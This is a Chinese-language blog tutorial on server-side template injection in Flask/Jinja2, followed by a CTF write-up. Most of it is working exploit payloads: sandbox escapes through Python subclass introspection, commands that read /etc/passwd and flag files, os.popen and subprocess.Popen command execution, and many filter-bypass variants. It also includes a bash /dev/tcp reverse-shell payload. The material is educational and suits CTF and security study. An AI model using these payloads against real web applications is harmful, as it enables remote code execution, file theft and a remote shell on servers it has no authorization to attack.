SSTI模板注入基础(Flask+Jinja2)

news2024/11/20 11:40:10

文章目录

  • 一、前置知识
    • 1.1 模板引擎
    • 1.2 渲染
  • 二、SSTI模板注入
    • 2.1 原理
    • 2.2 沙箱逃逸
      • 沙箱逃逸payload讲解
      • 其他重要payload
    • 2.3 过滤绕过
      • 点`.`被过滤
      • 下划线`_`被过滤
      • 单双引号`' "`被过滤
      • 中括号`[]`被过滤
      • 关键字被过滤
  • 三、PasecaCTF-2019-Web-Flask SSTI
    • 参考文献

一、前置知识

1.1 模板引擎

  模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
在这里插入图片描述

Flask是一个 web 框架,Jinja2是模板引擎。

模板引擎判断
在这里插入图片描述

绿色为执行成功,红色为执行失败。

1.2 渲染

  • 前端渲染( SPA , 单页面应用 )
      浏览器从服务器得到一些信息( 可能是 JSON 等各种数据交换格式所封装的数据包 , 也可能是合法的 HTML 字符串 ),浏览器将这些信息排列组合成人类可读的 HTML 字符串 . 然后解析为最终的 HTML 页面呈现给用户。整个过程都是由客户端浏览器完成的 , 因此对服务器后端的压力较小 , 仅需要传输数据即可。

    也就是说服务端只发送用户所需数据,浏览器负责将这部分数据排列成人类可读的HTML字符串。

  • 后端渲染( SSR , 服务器渲染 )
      浏览器会直接接收到经过服务器计算并排列组合后的 HTML 字符串 , 浏览器仅需要将字符串解析为呈现给用户的 HTML 页面就可以了 。整个过程都是由服务器完成的 , 因此对客户端浏览器的压力较小 , 大部分任务都在服务器端完成了 , 浏览器仅需要解析并呈现 HTML 页面即可。

    也就是说服务端将用户所需的数据排列成人类可读的HTML字符串了,浏览器只需对传输的数据解码就可以用了。

Flask中的重要渲染函数:render_template()render_template_string()
Jinja2模板语法:

{% ... %} //声明变量,当然也可以用于循环语句和条件语句。
{{ ... }} //用于将表达式打印到模板输出
{{...}}={%print(...)%}

二、SSTI模板注入

2.1 原理

  漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

  凡是使用模板的地方都可能会出现 SSTI 的问题,SSTI 不属于任何一种语言,沙盒绕过也不是,沙盒绕过只是由于模板引擎发现了很大的安全漏洞,然后模板引擎设计出来的一种防护机制,不允许使用没有定义或者声明的模块,这适用于所有的模板引擎。

举一个栗子,下面是后端代码:

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

name变量完全可控,那么写入Jinja2模板语言:
在这里插入图片描述
这大概就是SSTI模板注入,使用{{....}}的方式测试参数,可以用来判断是否存在SSTI模板注入。

2.2 沙箱逃逸

  在上述代码中,虽然理论上可以实现任意代码执行,但由于模板本身的沙盒安全机制,某些语句并不会执行,如直接name={{os.popen(%27dir%27)}}。沙盒逃逸的过程简单讲如下:

变量类型 → \rightarrow 找到所属类型 → \rightarrow 回溯基类 → \rightarrow 寻找可利用子类 → \rightarrow 最终payload

一些内建魔术方法如下:

  • __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
    >>> ''.__class__
    <type 'str'>
    >>> ().__class__
    <type 'tuple'>
    >>> [].__class__
    <type 'list'>
    >>> {}.__class__
    <type 'dict'>
    
  • __bases__:用来查看类的基类,也可是使用数组索引来查看特定位置的值。
    >>> ().__class__.__bases__
    (<type 'object'>,)
    >>> ''.__class__.__bases__
    (<type 'basestring'>,)
    >>> [].__class__.__bases__
    (<type 'object'>,)
    >>> {}.__class__.__bases__
    (<type 'object'>,)
    >>> [].__class__.__bases__[0]
    <type 'object'>
    
  • __mro__:也可以获取基类
    >>> ''.__class__.__mro__
    (<class 'str'>, <class 'object'>)
    >>> [].__class__.__mro__
    (<class 'list'>, <class 'object'>)
    >>> {}.__class__.__mro__
    (<class 'dict'>, <class 'object'>)
    >>> ().__class__.__mro__
    (<class 'tuple'>, <class 'object'>)
    >>> ().__class__.__mro__[1]            # 使用索引就能获取基类了
    <class 'object'>
    
  • __subclasses__():以列表返回类的子类
  • _globals__:以dict返回函数所在模块命名空间中的所有变量

沙箱逃逸payload讲解

  以下面的payload为例详细阐述沙箱逃逸的思路。{{''.__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__'].eval("__import__('os').popen('type flag.txt').read()")}}

核心思想:核心在于python中类的继承与被继承的关系,通过这种关系的查找合适的类,找到合适的类后利用该类中的函数或者模块去调用与读取文件相关的函数或命令,上述payload中获取flag或者重要文件信息的关键是eval("__import__('os').popen('type flag.txt').read()")

  1. 除了标准的python语法使用.访问变量属性外,还可以使用[]来访问变量属性。

  2. ''.__class____class__是类中的一个内置属性,值是该实例的对应的类。这里使用的是’'.class,得到的则是空字符串这个实例对应的类,也就是字符类。这样操作的意义是将我们现在操作的对象切换到类上面去,这样才能进行之后继承与被继承的操作。也可以使用()/[]/{}
    在这里插入图片描述

  3. ''.__class__.__base____base__也是类中的一个内置属性,值当前类的父类,而在python中object是一切类最顶层的父类,也就是说我们可以通过上一步获取到的类往上获取(一般数据类型的上一层父类中便有object),最终便会获取到object,而由于object的特殊性,我们便能从object往下获取到其他所有的类,其中便有着能实现我们读取flag功能的类。
    在这里插入图片描述

    其他类似功能的还有__bases__(返回值是数组,__base__返回值是一个值)、__mro__,但返回的数据包含类的元组,所以还需要下标选定object类)。

  4. ''.__class__.__base__.__subclasses__()__subclasses__ ()是类中的一个内置方法,返回值是包含当前类所有子类的一个列表,通过上一步获取到的object类我们实现了向下获取,接着我们需要在这些子类中获取合适的类。
    在这里插入图片描述

  5. ''.__class__.__base__.__subclasses__()[80].__init__ __init__是类中的内置方法,在这个类实例化是自动被调用,但是返回值只能是None,且在调用时必须传入该类的实例对象。如果我们不去调用它,此时我们获得的是我们选取的类中的__init__这个函数。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。
    在这里插入图片描述

    常用的可利用的类:<class 'os._wrap_close'><class 'subprocess.Popen'>

  6. ''.__class__.__base__.__subclasses__()[80].__init__.__globals____globals__是函数中的一个内置属性,以字典的形式返回当前空间的全局变量,而其中就能找到我们需要的目标模块__builtins__
    在这里插入图片描述

    注意:并不是每个类的__init__都拥有__globals__属性,找__init__中拥有__globals__属性的类的原因是:__builtins__模块中有很多我们常用的内置函数和类,其中就有eval()函数。
    在这里插入图片描述

其他重要payload

  1. 作为储存配置信息的变量config刚好对应的就是一个非常合适的类,{{config}}查看配置信息
    在这里插入图片描述
    因为这个类中__init__函数全局变量中已经导入了os模块,我们可以直接调用。

    {{config.__class__.__init__.__globals__['os'].popen('type flag.txt').read()}}
    
  2. 读取文件payload

    ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
    

    object类的子类是<type 'file'>

  3. 任意代码执行(获取popen方法)

    • <class 'os._wrap_close'>
      ''.__class__.__bases__[2].__subclasses__()[71].__init__.__globals__.popen('ls').read() //这个可以用
      
      # 反弹shell
      ''.__class__.__bases__[2].__subclasses__()[71].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()
      
    • <class 'subprocess.Popen'>
      ().__class__.__bases__[1].__subclasses__()[407]("cat /flag",shell=True,stdout=-1).communicate()[0]
      
      • subprocess.popen(conmand, shell=true, stdout=-1)用于执行外部命令。
        stdout=-1时,表示将子进程的标准输出重定向到标准错误输出(stderr),这意味着子进程的标准输出将与标准错误输出合并,并以标准错误输出的方式处理。也就是说后续使用communicate获取输出的时候,拿到的是标准输出和标准错误输出的一个列表。shell=True表示通过shell来执行命令。
      • subprocess.popen.communicate():获取执行命令后的输出。
    • 通过lipsum获取popen方法
      ?name={{lipsum.__globals__.os.popen(request.values.a).read()}}&a=cat /flag}}
      ?name={{lipsum.__globals__.__builtins__.open(/flag).read()}}
      
  4. {{request.environ}},一个与服务器环境相关的对象字典 .
    在这里插入图片描述

2.3 过滤绕过

.被过滤

	"".__class__ == ""["__class__"]
	"".__class__ == (""|attr("__class__"))
	"".__class__ == "".__getattribute__("__class__")

下划线_被过滤

	"__class__"=="\x5f\x5fclass\x5f\x5f" //UTF-8编码
	"".__class__ == (""|attr(request.values.cmd))&cmd=__class__

	# 例如原payload:
	?name={{lipsum.__globals__.os.popen(request.values.a).read()}}&a=cat /flag
	#改后的payload:
	?name={{(lipsum | attr(request.values.a)).os.popen(request.values.b).read()}}&b=ls&a=__globals__

单双引号' "被过滤

	# 当单双引号被过滤后以下访问将被限制
	{{ ().__class__.__base__.__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read() }}
 
	# 可以通过request.args的get传参输入引号内的内容,payload:
	{{ ().__class__.__base__.__subclasses__()[117].__init__.__globals__[request.args.popen](request.args.cmd).read() }}&popen=popen&cmd=cat /flag
 
	# 可以通过request.form的post传参输入引号内的内容,payload:
	{{ ().__class__.__base__.__subclasses__()[117].__init__.__globals__[request.form.popen](request.form.cmd).read() }}
	# 同时post传参?popen=popen&cmd=cat /flag
	
	# 使用request.values进行传参,payload;
	{{().__class__.__mro__[1].__subclasses__()[407](request.values.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag }}

中括号[]被过滤

# 当中括号被过滤时,如下将被限制访问
().__class__.__bases__[1].__subclasses__()[407]("cat /flag",shell=True,stdout=-1).communicate()[0]
 
# 可使用魔术方法__getitem__替换中括号[],payload如下:
().__class__.__bases__.__getitem__(1).__subclasses__().__getitem__(407)(request.values.a,shell=True,stdout=-1).communicate().__getitem__(0)}}&a=cat /flag

关键字被过滤

  1. os被过滤
#os被过滤,使用get()函数,获取字典中的值,如payload:
?name={{(lipsum | attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat ../flag
  1. request被过滤
#{{}}中的request被过滤,可能{%%}中的request没被过滤。print的前提是解析print里面的东西。
?name={%print((lipsum | attr(request.values.a)).get(request.values.b).popen(request.values.c).read())%}&a=__globals__&b=os&c=cat ../flag
  1. 数字被过滤
dict(e=a)|join|count #1
dict(ee=a)|join|count #2
  1. 构造字符
    既然字符被过滤,我们就构造字符。

    • ()|select|string
        ()|select|string得到的结果是: <generator object select_or_reject at 0x十六进制数字>,如下图:
      在这里插入图片描述
        使用()|select|string|list,将上述字符串转化为数组,数组元素为每一个字符。再使用pop()函数提取其中的字符,如获取下划线()|select|string|list.pop(24)
      在这里插入图片描述

      这里或许不能用中括号进行遴选,因为中括号被过滤了~

    • 字符拼接

    # 使用+或~
    ().__class__ == ()['__cl'+'ass__'] == {% set a='__cl' %}{% set b='ass__' %}{{()[a~b]}}(Jijia2)
    # dict() 与 join函数连用,连接字典的键
    __class__ == (_,_,(dict(class=1)|join),_,_)|join
    # chr(),输入ASCII码,输出ASCII对应的字符
    

    示例payload:

    ?name=
    {% set a=(()|select|string|list).pop(24) %}    // a = _
    {% set globals=(a,a,dict(globals=1)|join,a,a)|join %}  // globals=__globals__
    {% set builtins=(a,a,dict(builtins=1)|join,a,a)|join %} // builtins=__builtins__
    {% set a=(lipsum|attr(globals)).get(builtins) %}
    {% set chr=a.chr %}
    {% print a.open(chr(47)~chr(102)~chr(108)~chr(97)~chr(103)).read() %}
    

三、PasecaCTF-2019-Web-Flask SSTI

  登录靶机,输入1,页面又返回1,因为提示使用Flask框架,使用{{1+1}}测试是否渲染引擎为Jinja2
在这里插入图片描述在这里插入图片描述

说明此处存在SSTI模板注入,且框架为Flask,模板引擎Jinja2

在这里插入图片描述

注释:

  • jQuery是javascript的一个库, $号是jQuery类的一个别称,$()构造了一个jQuery对象,$()可以叫做jQuery的构造函数。
  • $.post语法:jQuery.post(url, data, success(data,textStatus,jqXHR), datatype),其中:
    • url,规定把请求发送到哪个URL;
    • data,规定连同请求发送给服务器的数据;
    • success(data,textStatus,jqXHR),请求成功时返回的回调函数;
    • datatype,规定预期服务器响应的数据类型。

测试发现过滤了. * _
在这里插入图片描述
在这里插入图片描述
使用UTF-8编码绕过过滤,{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"]}}
在这里插入图片描述
读取app.py文件,{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[117]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("ls")["read"]()}}

在这里插入图片描述
通过阅读代码,发现flag经过加密后放在app.config中。app就是一个Flask对象,app.config存储这个Flask对象的所有配置变量。
{{config}}查看配置变量,'flag': '(U0\x1fy\x13y:0Sq5(\x11F\x03o\x0fdB\x1c\x13[X!jYeN_\x10\x15'}
在这里插入图片描述
好,不会解密了。噶~

参考文献

  1. SSTI进阶
  2. SSTI漏洞利用及绕过总结(绕过姿势多样)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1332245.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

合并两个有序链表算法(leetcode第21题)

题目描述&#xff1a; 将两个升序链表合并为一个新的 升序 链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。 示例 1&#xff1a;输入&#xff1a;l1 [1,2,4], l2 [1,3,4] 输出&#xff1a;[1,1,2,3,4,4] 示例 2&#xff1a;输入&#xff1a;l1 [], l2 [] 输…

Python~列表/元组快速上手

一 列表/元组的概念 二 列表的创建和下标访问 创建列表 列表的下标访问/索引 内建函数len 负数下标[-len,len-1] 三 列表的切片 切片操作 begin:end 也适用于字符串和元组 左闭右开前后边界 效率(不拷贝) 指定步长 range内建函数也可以指定步长 负数步长 切片不会出现越界异…

2分钟教会你NFS文件服务器及客户端挂载

NFS简介 什么是 NFS? NFS&#xff08;Network File System&#xff09;网络文件系统目标&#xff1a;实现计算机之间通过网络共享资源将NFS主机分享的目录&#xff0c;挂载到自己电脑&#xff0c;我们就可以用自己电脑使用NFS的硬盘存储资源大白话说&#xff0c;就像百度云盘…

三秦通ETC续航改造

前些天开车时ETC每隔2分钟滴滴响一下&#xff0c;重插卡提示电池电压低 2.8V。看来应该是电池不行了。去银行更换ETC应该是需要费用的。还有一种办法是注销掉&#xff0c;然后去别的银行办一个。不过我想自己更换电池试一下。 首先拆下ETC&#xff0c;我使用的办法是开水烫。烧…

SysTick 定时器

SysTick定时器定义&#xff1a; SysTick 是一个 24 位的倒计数定时器&#xff0c;当计到 0 时&#xff0c;将从 RELOAD 寄存器中自动重装载定时初值。只要不把它在 SysTick 控制及状态寄存器中的使能位清除&#xff0c;就永不停息。 SysTick定时器分类&#xff1a; SysTic…

推荐几个开源H5小程序低代码工具

移动APP、H5、小程序曾风靡一时&#xff0c;结合当前无代码/低代码开发技术&#xff0c;有哪些免费开源的移动端H5/小程序软件&#xff0c;不用写代码即可发布H5页面&#xff0c;笔者对市场上主流的开源H5低代码/无代码工具/框架/组件进行了研究和验证&#xff0c;找到了几款比…

【LeetCode:1954. 收集足够苹果的最小花园周长 | 等差数列 + 公式推导】

&#x1f680; 算法题 &#x1f680; &#x1f332; 算法刷题专栏 | 面试必备算法 | 面试高频算法 &#x1f340; &#x1f332; 越难的东西,越要努力坚持&#xff0c;因为它具有很高的价值&#xff0c;算法就是这样✨ &#x1f332; 作者简介&#xff1a;硕风和炜&#xff0c;…

【AI提示词人物篇】创新艺术未来,让科技改变想象空间

AI 绘画学习难度和练习技巧 学习绘画的技巧 学习能难度&#xff1a; 外貌特征&#xff1a;AI需要学习识别和理解各种外貌特征&#xff0c;如发型、肤色、眼睛颜色等。这可能需要大量的训练数据和复杂的模型架构。 镜头提示&#xff1a;AI需要学习理解不同镜头提示的含义&…

谁会主导AIGC企业应用?

文/明道云创始人任向晖 李彦宏在近期的一个行业会议上抱怨大家都卷在大模型本身上&#xff0c;而忽视了AI原生应用的实现。他说的当然对&#xff0c;但这个状况绝对不能怪AI创业者。至少在企业应用领域&#xff0c;很多应用开发者并不确定企业愿意为什么样的应用买单&#xff0…

【shell脚本实战学习笔记】#1

shell脚本实战学习笔记#1 脚本编写场景需求&#xff1a; 编写一个比较数据大小的shell脚本&#xff0c;要求判断用户只能输入两位数字&#xff0c;不能是字符或其他特殊字符&#xff1b;并且在shell脚本中需要用到函数来控制执行顺序。 知识点&#xff1a;shell函数&#xff…

计算机组成原理第6章-(算术运算)【下】

移位运算 对于有符号数的移位称为算术移位,对于无符号数的移位称为逻辑移位。 算术移位规则【极其重要】 对于正数的算术移位,且不管是何种机器数【原码、反码、补码】,移位后出现的空位全部填0。 而对于负数的算术移位,机器数不同,移位后的规则也不同。 对于负数的原…

C#/WPF 播放音频文件

C#播放音频文件的方式&#xff1a; 播放系统事件声音使用System.Media.SoundPlayer播放wav使用MCI Command String多媒体设备程序接口播放mp3&#xff0c;wav&#xff0c;avi等使用WindowsMediaPlayer的COM组件来播放(可视化)使用DirectX播放音频文件使用Speech播放(朗读器&am…

yolo实现数据增强(数据集不够,快速增加数据集)

目录结构 附上数据增强的全部代码 # -*- codingutf-8 -*-import time import random import copy import cv2 import os import math import numpy as np from skimage.util import random_noise from lxml import etree, objectify import xml.etree.ElementTree as ET imp…

2024年,我们要勇敢奔跑!

本“人民&#xff0b;体验官”推广人民日报官方微博文化产品《2024年是个什么年&#xff1f;》 图&#xff1a;来源“人民&#xff0b;体验官”推广平台 朋友&#xff0c;2023已经进入尾声阶段&#xff0c;很快新的一年——2024年就来了。这新的一年是新中国成立75周年、澳门回…

linux运行可执行文件,通过c语言调用java的main方法

前言&#xff1a;以前一直在做Android开发&#xff0c;在某本书上看过一句话“Android上面不只有App类的程序可以运行&#xff0c;能在linux下运行的程序&#xff0c;也可以在Android上面运行” 一.编写C语言部分代码 1.定义java.h头文件 #include <jni.h>#ifndef _JAV…

分巧克力c语言

分析&#xff1a;分巧克力&#xff0c;把每一种大小列举出来&#xff0c;在对巧克力分解&#xff0c;在加上所以的分解块数&#xff0c;在和人数比较&#xff0c;如果够分&#xff0c;就保存这一次的结果&#xff0c;在增大巧克力&#xff0c;如果不够分了&#xff0c;就打印上…

Python 运维(三):使用 zipapp 将 Python 程序打包成单个可执行文件

大家好&#xff0c;我是水滴~~ 在 Python 开发中&#xff0c;我们经常需要将应用程序打包成可执行文件&#xff0c;以便在不具备 Python 环境的计算机上运行。Python 提供了多种打包工具&#xff0c;其中之一就是 zipapp。zipapp 可以将 Python 应用程序及其依赖打包成一个单独…

【高数定积分求解旋转体体积】 —— (上)高等数学|定积分|柱壳法|学习技巧

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 &#x1f4ab;个人格言:"没有罗马,那就自己创造罗马~" 目录 Shell method Setting up the Integral 例题 Example 1: Example 2: Example 3: Computing…

安装Kubernetes1.23、kubesphere3.4、若依项目自动打包部署到K8S记录

1.安装kubernetes1.23详细教程 kubernetes(k8s)集群超级详细超全安装部署手册 - 知乎 2.安装rancher动态存储 kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/master/deploy/local-path-storage.yaml3.安装kubesphere3.4 准备工作 您…

详解KMP算法

KMP算法应该是每一本《数据结构》书都会讲的&#xff0c;算是知名度最高的算法之一了&#xff0c;但很可惜&#xff0c;我大二那年压根就没看懂过~~~ 之后也在很多地方也都经常看到讲解KMP算法的文章&#xff0c;看久了好像也知道是怎么一回事&#xff0c;但总感觉有些地方自己…